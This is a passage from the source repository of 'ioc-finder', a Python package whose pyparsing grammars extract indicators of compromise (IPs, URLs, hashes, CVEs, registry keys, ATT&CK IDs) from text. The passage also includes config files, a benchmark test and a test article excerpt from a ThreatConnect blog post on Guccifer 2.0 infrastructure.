 62 | )
 63 | # basically, the grammar below says: start at any word that starts with a '.' or a number;
 64 | # I want to match words that start with a '.' because this will fail later in the grammar...
 65 | # and I do not want to match anything that starts with a '.'
 66 | ipv4_address = (
 67 |     alphanum_word_start
 68 |     + WordStart("." + nums)
 69 |     + Combine((ipv4_section + ".") * 3 + ipv4_section)
 70 |     + NotAny(Regex(r"\.\S"))
 71 |     + alphanum_word_end
 72 | )
 73 | 
 74 | ipv6_word_start = WordStart(wordChars=alphanums + ":")
 75 | ipv6_word_end = WordEnd(wordChars=alphanums + ":")
 76 | 
 77 | hexadectet = Word(hexnums, min=1, max=4)
 78 | ipv6_address_full = ipv6_word_start + Combine((hexadectet + ":") * 7 + hexadectet)
 79 | 
 80 | # the condition on the end of this grammar is designed to make sure that any shortened ipv6 addresses have '::' in them
 81 | ipv6_address_shortened = Combine(OneOrMore(Or([hexadectet + Word(":"), Word(":")])) + hexadectet).addCondition(
 82 |     lambda tokens: tokens[0].count("::") > 0
 83 | )
 84 | 
 85 | ipv6_address = (
 86 |     Or([ipv6_address_full, ipv6_address_shortened]).addCondition(lambda tokens: tokens[0].count(":") > 1)
 87 |     + ipv6_word_end
 88 | )
 89 | 
 90 | complete_email_comment = Regex(r"\([a-zA-Z0-9]+\)")
 91 | # the complete_email_local_part grammar ignores the fact that characters like <<<(),:;<>@[\] >>>
 92 | # are possible in a quoted complete_email_local_part
 93 | # (and the double-quotes and backslash should be preceded by a backslash)
 94 | complete_email_local_part = Combine(
 95 |     Optional(complete_email_comment)("email_address_start_comment")
 96 |     + OneOrMore(MatchFirst([Word(alphanums + "!#$%&'*+-/=?^_`{|}~." + '"'), CaselessLiteral("\\@")]))
 97 |     + Optional(complete_email_comment)("email_address_end_comment")
 98 | )
 99 | complete_email_address = Combine(
100 |     complete_email_local_part("email_address_local_part")
101 |     + "@"
102 |     + Or([domain_name, "[" + ipv4_address + "]", "[IPv6:" + ipv6_address + "]"])("email_address_domain")
103 | )
104 | 
105 | email_local_part = Word(alphanums, bodyChars=alphanums + "+-_.").set_parse_action(pyparsing_common.downcase_tokens)
106 | email_address = alphanum_word_start + Combine(
107 |     email_local_part("email_address_local_part")
108 |     + "@"
109 |     + Or([domain_name, "[" + ipv4_address + "]", "[IPv6:" + ipv6_address + "]"])("email_address_domain")
110 | )
111 | 
112 | url_scheme = one_of(schemes, caseless=True)
113 | port = Word(":", nums, min=2)
114 | url_authority = Combine(Or([email_address, domain_name, ipv4_address, ipv6_address]) + Optional(port)("port"))
115 | # The url_path_word characters are taken from https://www.ietf.org/rfc/rfc3986.txt...
116 | # (of particular interest is "Appendix A.  Collected ABNF for URI")
117 | # Although the ":" character is not valid in url paths,
118 | # some urls are written with the ":" unencoded so we include it below
119 | url_path_word = Word(alphanums + "-._~!$&'()*+,;=:%")
120 | url_path = Combine(OneOrMore(MatchFirst([url_path_word, Literal("/")])))
121 | url_query = Word(printables, excludeChars="#\"']")
122 | url_fragment = Word(printables, excludeChars="?\"']")
123 | url = alphanum_word_start + Combine(
124 |     url_scheme("url_scheme")
125 |     + "://"
126 |     + url_authority("url_authority")
127 |     + Optional(Combine("/" + Optional(url_path)))("url_path")
128 |     + (Optional(Combine("?" + url_query)("url_query")) & Optional(Combine("#" + url_fragment)("url_fragment")))
129 | )
130 | scheme_less_url = alphanum_word_start + Or(
131 |     [
132 |         url,
133 |         Combine(
134 |             Combine(url_authority("url_authority") + Combine("/" + Optional(url_path))("url_path"))
135 |             + (Optional(Combine("?" + url_query)("url_query")) & Optional(Combine("#" + url_fragment)("url_fragment")))
136 |         ),
137 |     ]
138 | )
139 | 
140 | # this allows for matching file hashes preceded by an 'x' or 'X'...
141 | # see https://github.com/fhightower/ioc-finder/issues/41
142 | file_hash_word_start = WordStart(wordChars=alphanums.replace("x", "").replace("X", ""))
143 | md5 = (
144 |     file_hash_word_start
145 |     + Word(hexnums, exact=32).set_parse_action(pyparsing_common.downcase_tokens)
146 |     + alphanum_word_end
147 | )
148 | imphash = Combine(
149 |     Or([CaselessLiteral("imphash"), CaselessLiteral("import hash")])
150 |     + Optional(Word(printables, excludeChars=alphanums))
151 |     + md5("hash"),
152 |     joinString=" ",
153 |     adjacent=False,
154 | )
155 | sha1 = (
156 |     file_hash_word_start
157 |     + Word(hexnums, exact=40).set_parse_action(pyparsing_common.downcase_tokens)
158 |     + alphanum_word_end
159 | )
160 | sha256 = (
161 |     file_hash_word_start
162 |     + Word(hexnums, exact=64).set_parse_action(pyparsing_common.downcase_tokens)
163 |     + alphanum_word_end
164 | )
165 | authentihash = Combine(
166 |     CaselessLiteral("authentihash") + Optional(Word(printables, excludeChars=alphanums)) + sha256("hash"),
167 |     joinString=" ",
168 |     adjacent=False,
169 | )
170 | sha512 = (
171 |     file_hash_word_start
172 |     + Word(hexnums, exact=128).set_parse_action(pyparsing_common.downcase_tokens)
173 |     + alphanum_word_end
174 | )
175 | 
176 | year = Word("12") + Word(nums, exact=3)
177 | cve = (
178 |     alphanum_word_start
179 |     + Combine(
180 |         CaselessLiteral("cve").set_parse_action(replace_with("CVE"))
181 |         + Word("- ").set_parse_action(replace_with("-"))
182 |         + year("year")
183 |         + Word("-")
184 |         + Word(nums, min=4)("cve_id")
185 |     )
186 |     + alphanum_word_end
187 | )
188 | 
189 | asn = (
190 |     alphanum_word_start
191 |     + Combine(
192 |         Or(
193 |             [
194 |                 Literal("AS") + Optional(Word("N ")).set_parse_action(replace_with("N")),
195 |                 Literal("as").set_parse_action(replace_with("ASN")),
196 |                 (Literal("asn") + Optional(" ")).set_parse_action(replace_with("ASN")),
197 |             ]
198 |         )
199 |         + Word(nums)("as_number")
200 |     )
201 |     + alphanum_word_end
202 | )
203 | 
204 | ipv4_cidr = (
205 |     alphanum_word_start
206 |     + Combine(ipv4_address("cidr_address") + "/" + Word(nums, max=2)("cidr_bit_range"))
207 |     + alphanum_word_end
208 | )
209 | 
210 | root_key_list = [
211 |     "HKEY_LOCAL_MACHINE",
212 |     "HKLM",
213 |     "HKEY_CURRENT_CONFIG",
214 |     "HKCC",
215 |     "HKEY_CLASSES_ROOT",
216 |     "HKCR",
217 |     "HKEY_CURRENT_USER",
218 |     "HKCU",
219 |     "HKEY_USERS",
220 |     "HKU",
221 |     "HKEY_PERFORMANCE_DATA",
222 |     "HKEY_DYN_DATA",
223 | ]
224 | root_key = one_of(root_key_list)
225 | 
226 | 
def hasMultipleConsecutiveSpaces(string):
    """Return True if the given string has multiple, consecutive spaces.

    The whole string is scanned (not just its beginning), so a run of two or
    more spaces is detected wherever it occurs.

    Args:
        string: The text to inspect.

    Returns:
        bool: True when at least one run of two or more spaces is present,
        False otherwise (including for the empty string).
    """
    # `re.search` looks anywhere in the string; `re.match` would only look at
    # position 0 and miss runs of spaces in the middle or at the end.
    return re.search("  +", string) is not None
230 | 
231 | 
def hasBothOrNeitherAngleBrackets(string):
    """Make sure a string either has both '<' and '>' or neither of those angle brackets.

    Only the presence of each bracket is checked; their order and count are
    not considered.

    Args:
        string: The text to inspect.

    Returns:
        bool: True when '<' and '>' are both present or both absent, False
        when exactly one of them appears.
    """
    # The string is acceptable exactly when the two membership tests agree.
    return ("<" in string) == (">" in string)
246 | 
247 | 
248 | registry_key_subpath_section = Combine(
249 |     Word("\\")
250 |     + Optional(Word("<"))
251 |     + Word(alphanums)
252 |     + ZeroOrMore(
253 |         # registry key paths may contain a file extension which requires that we capture registry
254 |         # key path sections with a period (e.g. `notepad.exe`)
255 |         Optional(Word(".", max=1))
256 |         # the registry key path section can contain any alphanum text (including spaces) as long as the text is not
257 |         # one of the registry key path root keys and as long as there are not multiple, consecutive spaces
258 |         + Word(alphanums + " ").addCondition(
259 |             lambda tokens: tokens[0].strip() not in root_key_list and not hasMultipleConsecutiveSpaces(tokens[0])
260 |         )
261 |     )
262 |     + Optional(Word(">"))
263 | ).addCondition(lambda tokens: hasBothOrNeitherAngleBrackets(tokens[0]))
264 | registry_key_subpath = OneOrMore(registry_key_subpath_section)
265 | registry_key_path = (
266 |     alphanum_word_start
267 |     + Combine(
268 |         Optional("<").set_parse_action(replace_with(""))
269 |         + root_key("registry_key_root")
270 |         + Optional(">").set_parse_action(replace_with(""))
271 |         + registry_key_subpath("registry_key_subpath")
272 |     )
273 |     + alphanum_word_end
274 | )
275 | 
276 | # see https://support.google.com/adsense/answer/2923881?hl=en
277 | google_adsense_publisher_id = (
278 |     alphanum_word_start
279 |     # we use `one_of("pub- PUB-")` instead of something like `CaselessLiteral("pub-")` b/c...
280 |     # we only want to parse "pub" when it is all upper or lowercased (not "pUb" or other, similar variations)
281 |     + Combine(one_of("pub- PUB-") + Word(nums, exact=16)).set_parse_action(pyparsing_common.downcase_tokens)
282 |     + alphanum_word_end
283 | )
284 | 
285 | # see https://support.google.com/analytics/answer/7372977?hl=en
286 | google_analytics_tracker_id = (
287 |     alphanum_word_start
288 |     + Combine(
289 |         # we use `one_of("ua- UA-")` instead of something like `CaselessLiteral("ua-")` b/c...
290 |         # we only want to parse "ua" when it is all upper or lowercased (not "uA" or other, similar variations)
291 |         one_of("ua- UA-")
292 |         + Word(nums, min=6)("account_number")
293 |         + "-"
294 |         + Word(nums)("property_number")
295 |     ).set_parse_action(pyparsing_common.upcase_tokens)
296 |     + alphanum_word_end
297 | )
298 | 
299 | # see https://en.bitcoin.it/wiki/Address
300 | # (and https://github.com/bitcoin/bips/blob/master/bip-0173.mediawiki#segwit-address-format for Bech32 addresses)
301 | bitcoin_address = (
302 |     alphanum_word_start
303 |     + MatchFirst(
304 |         [
305 |             Regex(r"1[a-zA-Z0-9]{25,34}"),
306 |             Regex(r"3[a-zA-Z0-9]{25,34}"),
307 |             Regex(r"bc1[a-zA-Z0-9]{11,71}"),
308 |         ]
309 |     )
310 |     + alphanum_word_end
311 | )
312 | 
313 | monero_address = alphanum_word_start + Regex("4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}") + alphanum_word_end
314 | 
315 | # see https://github.com/fhightower/ioc-finder/issues/18
316 | xmpp_address = alphanum_word_start + Combine(
317 |     email_local_part("email_address_local_part") + "@" + domain_name("jabber_address_domain")
318 | ).addCondition(lambda tokens: "jabber" in tokens[0].split("@")[-1] or "xmpp" in tokens[0].split("@")[-1])
319 | 
320 | # the mac address grammar was developed from https://en.wikipedia.org/wiki/MAC_address#Notational_conventions
321 | # handles xx:xx:xx:xx:xx:xx or xx-xx-xx-xx-xx-xx
322 | mac_address_16_bit_section = Combine((Word(hexnums, exact=2) + one_of("- :")) * 5 + Word(hexnums, exact=2))
323 | # handles xxxx.xxxx.xxxx
324 | mac_address_32_bit_section = Combine((Word(hexnums, exact=4) + ".") * 2 + Word(hexnums, exact=4))
325 | mac_address_word_start = WordStart(wordChars=alphanums + ":-.")
326 | mac_address_word_end = WordEnd(wordChars=alphanums + ":-.")
327 | mac_address = (
328 |     mac_address_word_start + MatchFirst([mac_address_16_bit_section, mac_address_32_bit_section]) + mac_address_word_end
329 | )
330 | 
331 | # the structure of an ssdeep hash is: chunksize:chunk:double_chunk
332 | # we add a condition to the ssdeep grammar to make sure that the second section of the grammar
333 | # (the chunk) is at least as big if not bigger than the third section (the double_chunk)
334 | ssdeep = alphanum_word_start + Combine(
335 |     Word(nums) + ":" + Word(alphanums + "/+", min=3) + ":" + Word(alphanums + "/+", min=3)
336 | ).addCondition(lambda tokens: len(tokens[0].split(":")[1]) >= len(tokens[0].split(":")[2]))
337 | 
338 | user_agent_platform_version = Regex(r"[0-9]+(\.[0-9]*)*")
339 | user_agent_start = Combine(Regex(r"[Mm]ozilla/") + user_agent_platform_version)
340 | user_agent_details = Regex(r"\(.+?\)")
341 | user_agent_platform = Combine(
342 |     alphanum_word_start
343 |     + Regex(r"[a-zA-Z]{2,}/?").addCondition(lambda tokens: tokens[0].lower().strip("/") != "mozilla")
344 |     + Optional(user_agent_platform_version)
345 | )
346 | user_agent = Combine(
347 |     user_agent_start + user_agent_details + ZeroOrMore(user_agent_platform + Optional(user_agent_details)),
348 |     joinString=" ",
349 |     adjacent=False,
350 | )
351 | 
352 | # https://github.com/fhightower/ioc-finder/issues/13
353 | file_ending = Word(alphas, max=5)
354 | windows_file_path = alphanum_word_start + Combine(
355 |     Char(alphanums) + ":" + Word(printables + " ", exclude_chars=".") + "." + file_ending
356 | )
357 | 
358 | # we need to add '/' and '~' to the alphanum_word_start so that the grammar will match words starting with '/' and '~'
359 | # we add ':' to the alphanum_word_start because we want to avoid parsing urls as file paths
360 | # (e.g. "//twitter.com" from "https://twitter.com/")
361 | unix_file_path_wordstart = copy.deepcopy(alphanum_word_start)
362 | unix_file_path_wordstart.wordChars.add(":")
363 | unix_file_path_wordstart.wordChars.add("/")
364 | unix_file_path_wordstart.wordChars.add("~")
365 | 
366 | unix_file_path = unix_file_path_wordstart + Combine(
367 |     one_of("~ /") + Word(printables + " ", exclude_chars=".") + "." + file_ending
368 | ).addCondition(lambda tokens: "//" not in tokens[0])
369 | file_path = Or([windows_file_path, unix_file_path]) + alphanum_word_end
370 | 
371 | # be aware that the phone_number grammar assumes that the text being sent to it has been reversed
372 | phone_number_connector = Word(" .-", max=3)
373 | phone_number_format_1 = Combine(
374 |     Word(nums, exact=4)
375 |     + phone_number_connector
376 |     + Word(nums, exact=3)
377 |     + Optional(phone_number_connector + Optional(")") + Word(nums) + Optional("("))
378 | )
379 | 
380 | phone_number = Or([phone_number_format_1])
381 | 
382 | attack_sub_technique = Literal(".") + Word(nums, exact=3)
383 | pre_attack_tactics_grammar = (
384 |     alphanum_word_start
385 |     + Or([CaselessLiteral(i) for i in pre_attack_tactics]).set_parse_action(pyparsing_common.upcase_tokens)
386 |     + alphanum_word_end
387 | )
388 | pre_attack_techniques_grammar = (
389 |     alphanum_word_start
390 |     + Combine(
391 |         one_of(pre_attack_techniques, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
392 |         + Optional(attack_sub_technique)
393 |     )
394 |     + alphanum_word_end
395 | )
396 | 
397 | enterprise_attack_mitigations_grammar = (
398 |     alphanum_word_start + one_of(enterprise_attack_mitigations, caseless=True) + alphanum_word_end
399 | )
400 | enterprise_attack_tactics_grammar = (
401 |     alphanum_word_start
402 |     + one_of(enterprise_attack_tactics, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
403 |     + alphanum_word_end
404 | )
405 | enterprise_attack_techniques_grammar = (
406 |     alphanum_word_start
407 |     + Combine(
408 |         one_of(enterprise_attack_techniques, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
409 |         + Optional(attack_sub_technique)
410 |     )
411 |     + alphanum_word_end
412 | )
413 | 
414 | mobile_attack_mitigations_grammar = (
415 |     alphanum_word_start + one_of(mobile_attack_mitigations, caseless=True) + alphanum_word_end
416 | )
417 | mobile_attack_tactics_grammar = (
418 |     alphanum_word_start
419 |     + one_of(mobile_attack_tactics, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
420 |     + alphanum_word_end
421 | )
422 | mobile_attack_techniques_grammar = (
423 |     alphanum_word_start
424 |     + Combine(
425 |         one_of(mobile_attack_techniques, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
426 |         + Optional(attack_sub_technique)
427 |     )
428 |     + alphanum_word_end
429 | )
430 | 
431 | tlp_colors = one_of("red amber green white", caseless=True)
432 | 
433 | tlp_label = Combine(
434 |     CaselessLiteral("tlp")
435 |     + Or([Literal(":"), Literal("-"), Literal(" "), Empty()]).set_parse_action(lambda x: ":")
436 |     + tlp_colors
437 | ).set_parse_action(pyparsing_common.upcase_tokens)
438 | 


--------------------------------------------------------------------------------
/mkdocs.yml:
--------------------------------------------------------------------------------
 1 | site_name: Indicator of Compromise Finder Docs
 2 | site_url: ""
 3 | repo_url: https://github.com/fhightower/ioc-finder
 4 | repo_name: ioc-finder
 5 | theme:
 6 |   name: material
 7 |   custom_dir: docs/overrides
 8 |   palette:
 9 |     - media: "(prefers-color-scheme: light)"
10 |       scheme: default
11 |       toggle:
12 |         icon: material/lightbulb-outline
13 |         name: Switch to dark mode
14 |       primary: deep orange
15 |       accent: deep orange
16 |     - media: "(prefers-color-scheme: dark)"
17 |       scheme: slate
18 |       toggle:
19 |         icon: material/lightbulb
20 |         name: Switch to light mode
21 |       primary: deep orange
22 |       accent: deep orange
23 |   font: false
24 |   icon:
25 |     logo: material/magnify
26 |   features:
27 |     - navigation.instant
28 |     - navigation.top
29 |     - header.autohide
30 |     - toc.integrate
31 | markdown_extensions:
32 |   - pymdownx.highlight
33 |   - pymdownx.superfences
34 |   - attr_list
35 |   - admonition
36 |   - pymdownx.details
37 |   - meta
38 |   - toc:
39 |       permalink: true
40 | nav:
41 |     - Home: index.md
42 |     - Quick Start: quick-start.md
43 |     - Developer Docs: development.md
44 | 


--------------------------------------------------------------------------------
/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_missing_imports = True
3 | 


--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
 1 | [tool.black]
 2 | line-length = 120
 3 | 
 4 | [tool.isort]
 5 | line_length = 120
 6 | include_trailing_comma = true
 7 | 
 8 | [tool.pylint."MESSAGES CONTROL"]
 9 | max-line-length = 120
10 | disable = "C0114, R1705, C0103"
11 | 
12 | [tool.pytest.ini_options]
13 | addopts = "-n auto -vv --cov=. --cov-report term-missing --cov-fail-under 95"
14 | python_files = "tests/test_*.py"
15 | 
16 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | click>=7.1.2,<9.0
2 | ioc-fanger>=4.2.1,<4.3
3 | pyparsing>=3.0,<=3.1.1
4 | d8s-strings>=0.5.0,<1.0
5 | 


--------------------------------------------------------------------------------
/requirements_dev.txt:
--------------------------------------------------------------------------------
 1 | black==23.3.0
 2 | bump2version>=1.0.1,<2.0
 3 | codecov>=2.1.11,<3.0
 4 | d8s-file-system>=0.10.0,<1.0
 5 | d8s-lists>=0.8.0,<1.0
 6 | flake8-cognitive-complexity>=0.1.0,<1.0
 7 | flake8>=4.0,<7.0
 8 | hypothesis>=6.14.1,<7.0
 9 | ipython>7.0,<9.0
10 | mypy>=0.910,<2.0
11 | pylint>=2.9.6,<3.0
12 | pytest-benchmark>=3.4.1,<5.0
13 | pytest-cov>=2.12.1,<5.0
14 | pytest>=7.0.1,<8.0
15 | pytest-xdist>=2.5.0,<3.0
16 | requests>=2.25.1,<3.0
17 | mkdocs-material>=8.0.1,<10.0
18 | 


--------------------------------------------------------------------------------
/setup.cfg:
--------------------------------------------------------------------------------
 1 | [bumpversion]
 2 | current_version = 7.3.0
 3 | commit = True
 4 | tag = True
 5 | 
 6 | [bumpversion:file:setup.py]
 7 | search = version="{current_version}"
 8 | replace = version="{new_version}"
 9 | 
10 | [bumpversion:file:ioc_finder/__init__.py]
11 | search = __version__ = "{current_version}"
12 | replace = __version__ = "{new_version}"
13 | 
14 | [bdist_wheel]
15 | universal = 1
16 | 
17 | [flake8]
18 | exclude = docs
19 | max-line-length = 120
20 | per-file-ignores = 
21 | 	ioc_finder/__init__.py:F403,F401
22 | 	tests/*:E501
23 | 
24 | [pep8]
25 | max-line-length = 120
26 | 


--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
 1 | from setuptools import setup, find_packages
 2 | 
 3 | with open("README.md") as readme_file:
 4 |     readme = readme_file.read()
 5 | 
 6 | with open("requirements.txt") as requirements_file:
 7 |     requirements = requirements_file.read().splitlines()
 8 | 
 9 | setup(
10 |     name="ioc_finder",
11 |     version="7.3.0",
12 |     description="Python package for finding and parsing indicators of compromise from text.",
13 |     entry_points={"console_scripts": ["ioc-finder=ioc_finder.ioc_finder:cli_find_iocs"]},
14 |     long_description=readme,
15 |     long_description_content_type="text/markdown",
16 |     author="Floyd Hightower",
17 |     author_email="",
18 |     url="https://github.com/fhightower/ioc-finder",
19 |     project_urls={
20 |         "Changelog": "https://github.com/fhightower/ioc-finder/blob/main/CHANGELOG.md",
21 |         "Documentation": "https://hightower.space/ioc-finder/",
22 |         "Source": "https://github.com/fhightower/ioc-finder",
23 |         "Issues": "https://github.com/fhightower/ioc-finder/issues",
24 |         "Sponsor": "https://github.com/sponsors/fhightower",
25 |     },
26 |     packages=find_packages(exclude=("tests", "docs")),
27 |     include_package_data=True,
28 |     install_requires=requirements,
29 |     license="GNU Lesser General Public License v3",
30 |     zip_safe=True,
31 |     keywords="iocs,indicators of compromise,parsing,finding,searching,threat intelligence,malware,threat hunting,observables,domains,domain names,asns,cidr,cidr ranges,ips,ip addresses,urls,email addresses,md5,sha1,sha256,google ads,cve,file paths",
32 |     classifiers=[
33 |         "Development Status :: 5 - Production/Stable",
34 |         "Intended Audience :: Developers",
35 |         "License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)",
36 |         "Natural Language :: English",
37 |         "Programming Language :: Python :: 3",
38 |         "Programming Language :: Python :: 3.7",
39 |         "Programming Language :: Python :: 3.8",
40 |         "Programming Language :: Python :: 3.9",
41 |         "Programming Language :: Python :: 3.10",
42 |     ],
43 |     test_suite="tests",
44 | )
45 | 


--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fhightower/ioc-finder/06ae551de766e542ecf2d200271162866cbf0f73/tests/__init__.py


--------------------------------------------------------------------------------
/tests/benchmarks.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from pathlib import Path
 3 | 
 4 | from pytest import mark
 5 | 
 6 | from ioc_finder import find_iocs, parse_urls
 7 | 
 8 | SHORT_TEXT = """abc.py bar.com example.com foo.com swissjabber.de https://example.com/test%20page/foo.com/bingo.php?q=bar.com foo@swissjabber.de me@example.com me@example.com 1.1.1.1/0 imphash 18ddf28a71089acdbab5038f58044c0a authentihash 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4 1.1.1.1 2001:0db8:0000:0000:0000:ff00:0042:8329 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F 0000:0000:ff00 2001:0db8:0000 ASN123 CVE-2022-1234 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows pub-1234567891234567 UA-000000-1 imphash 18ddf28a71089acdbab5038f58044c0a 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp AA-F2-C9-A6-B3-4F Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) TLP:RED ~/foo/bar/abc.py enterprise pre_attack pre_attack M1036 M1015 TA0012 T1329"""
 9 | LONG_TEXT = Path(os.path.join(os.path.dirname(__file__), "./data/long-article-1.txt")).read_text(encoding="utf8")
10 | TEXTS = (SHORT_TEXT, LONG_TEXT)
11 | 
12 | 
13 | def _run(f):
14 |     for text in TEXTS:
15 |         f(text)
16 | 
17 | 
18 | def test_benchmarks(benchmark):
19 |     benchmark(_run, find_iocs)
20 | 
21 | 
22 | def test_parse_urls(benchmark):
23 |     benchmark(_run, parse_urls)
24 | 


--------------------------------------------------------------------------------
/tests/data/long-article-1.txt:
--------------------------------------------------------------------------------
  1 | # Source: https://threatconnect.com/blog/guccifer-2-all-roads-lead-russia/
  2 | 
  3 | 07.26.16
  4 | Guccifer 2.0: All Roads Lead to Russia
  5 | IN THREAT RESEARCH | BY THREATCONNECT RESEARCH TEAM
  6 | BG All Roads Lead to Russia
  7 | Guccifer 2.0: All Roads Lead to Russia
  8 | Update 07/26/2016  4:00pm EDT
  9 | Joe Uchill with The Hill, who has previously covered Guccifer 2.0 and the Wikileaks DNC data dump, has provided us with redacted information on his communications with Guccifer 2.0 that has raised our confidence in our current assessments and hypotheses.
 10 | 
 11 | Check out Joe’s story here.
 12 | 
 13 |  
 14 | 
 15 | ThreatConnect follows Guccifer 2.0’s French breadcrumbs back to a Russian VPN Service
 16 | Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, “Russian Cyber Operations on Steroids“, and “Can a BEAR Fit Down a Rabbit Hole?“.
 17 | 
 18 | In our initial Guccifer 2.0 analysis, ThreatConnect highlighted technical and non-technical inconsistencies in the purported DNC hacker’s story as well as a curious theme of French “connections” surrounding various Guccifer 2.0 interactions with the media. We called out these connections as they overlapped, albeit minimally, with FANCY BEAR infrastructure identified in CrowdStrike’s DNC report.
 19 | 
 20 | Now, after further investigation, we can confirm that Guccifer 2.0 is using the Russia-based Elite VPN service to communicate and leak documents directly with the media. We reached this conclusion by analyzing the infrastructure associated with an email exchange with Guccifer 2.0 shared with ThreatConnect by Vocativ’s Senior Privacy and Security reporter Kevin Collier. This discovery strengthens our ongoing assessment that Guccifer 2.0 is a Russian propaganda effort and not an independent actor.
 21 | 
 22 | Analyzing the Headers from Guccifer 2.0 Emails
 23 | On June 21, 2016, TheSmokingGun reported they communicated with Guccifer 2.0 via a French AOL account. We examined the French language settings observed in Guccifer 2.0’s Twitter metadata as well as a pattern of Twitter follows that suggested Guccifer 2.0’s account was created from a French IP address. We hypothesized at the time that Guccifer 2.0 might be using French infrastructure to interact with the media.
 24 | 
 25 | WHITE PAPER: 6 EASY WAYS TO ADVANCE YOUR CYBERSECURITY PROGRAM WHEN YOU HAVE A SMALL TEAM
 26 | As a result of our continuing analysis series that focused on FANCY BEAR infrastructure, Guccifer 2.0’s background, and his claims, media sources who have interacted with Guccifer 2.0 via Twitter and email shared additional data with us. One of which is Vocativ’s Kevin Collier, details of his story can be found here.
 27 | 
 28 | Using the ThreatConnect Email Analyze feature we were able to analyze an email exchange Kevin had with Guccifer 2.0, identifying details of the adversary (Guccifer 2.0’s) email account and infrastructure while also redacting sensitive details of Kevin’s email and infrastructure. Analyzing the metadata revealed several additional investigative leads.
 29 | 
 30 | During the Email Import process ThreatConnect analyzes an email message header and highlights indicators of interest with a color code that reveals if the indicators already exist within the platform. This helps overburdened eyes or greenhorn analysts quickly understand what they are seeing. At the same time ThreatConnect excludes legitimate or benign details that are not of value to our investigation.
 31 | 
 32 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 1
 33 | As we can see here within ThreatConnect, Guccifer 2.0’s AOL email message reveals the originating IP address as 95.130.15[.]34 (DigiCube SaS – France). This is the IP address of the host which authenticated into AOL’s web user interface and sent the email. We can also tell this IP was not spoofed because the metadata was added by AOL when sent from within their infrastructure with appropriate DomainKeys Identified Mail (DKIM) configurations.
 34 | 
 35 | The fact that Guccifer 2.0 is indeed leveraging a French AOL account stands out from a technical perspective. Very few hackers with Guccifer 2.0’s self-acclaimed skills would use a free webmail service that would give away a useful indicator like the originating IP address. Most seasoned security professionals will be familiar with email providers that are more likely to cooperate with law enforcement and how much metadata a provider might reveal about their users. Taken together with inconsistencies in Guccifer 2.0’s remarks that make his technical claims sound implausible, this detail makes us think the individual(s) operating the AOL account are not really hackers or even that technically savvy. Instead, propagandist or public relations individuals who are interacting with journalists.
 36 | 
 37 | Drilling into Guccifer 2.0 Infrastructure: Picture of a VPN Starts to Emerge
 38 | As we focused in on IP Address 95.130.15[.]34 we queried public sources such as Shodan as well as Censys to discover what services might be enabled on this host. The goal of this was to better understand if this infrastructure is owned and operated, leased or co-opted by Guccifer 2.0 and how the infrastructure might be used to create space between an originating “source” network and investigators, or curious journalists.
 39 | 
 40 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 2According to Shodan, OpenSSH (TCP/22), DNS (UDP/53) and Point-to-Point Tunneling Protocol (PPTP) (TCP/1723) services have been enabled on this host. Secure shell (SSH) and point-to-point tunneling protocol services strongly suggest a VPN and/or a proxy, both of which would allow the Guccifer 2.0 persona to put distance between his originating network and those with whom he is communicating.
 41 | 
 42 | The SSH fingerprint can be used as an identifier, linking other IP addresses that use the same SSH encryption key. The SSH fingerprint for 95.130.15[.]34 (DigiCube SaS – France) is Fingerprint: 80:19:eb:c8:80:a1:c6:ea:ea:37:ba:c0:26:c6:7f:61. Searching for other servers that share this fingerprint at the time of writing, we discovered six additional IP Addresses over the course of our research (95.130.9[.]198; 95.130.15[.]36; 95.130.15[.]37; 95.130.15[.]38; 95.130.15[.]40;  95.130.15[.]41).
 43 | 
 44 | Each IP address falls within the 95.130.8.0/21 network range. This range is assigned to Digicube SAS, a French hosting provider which is assigned the Autonomous System AS196689. An IP address is analogous to the apartment numbers in an apartment building. The entire building is owned and operated by AS196689, but certain IP addresses may be let out to other companies and organizations.
 45 | 
 46 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia fingerprint
 47 | The fact that Guccifer 2.0 would use a proxy service is not surprising, and our first stop was to check with various TOR proxy registration sites. None of these seven IP addresses are part of reported TOR infrastructure from what we were able to uncover.
 48 | 
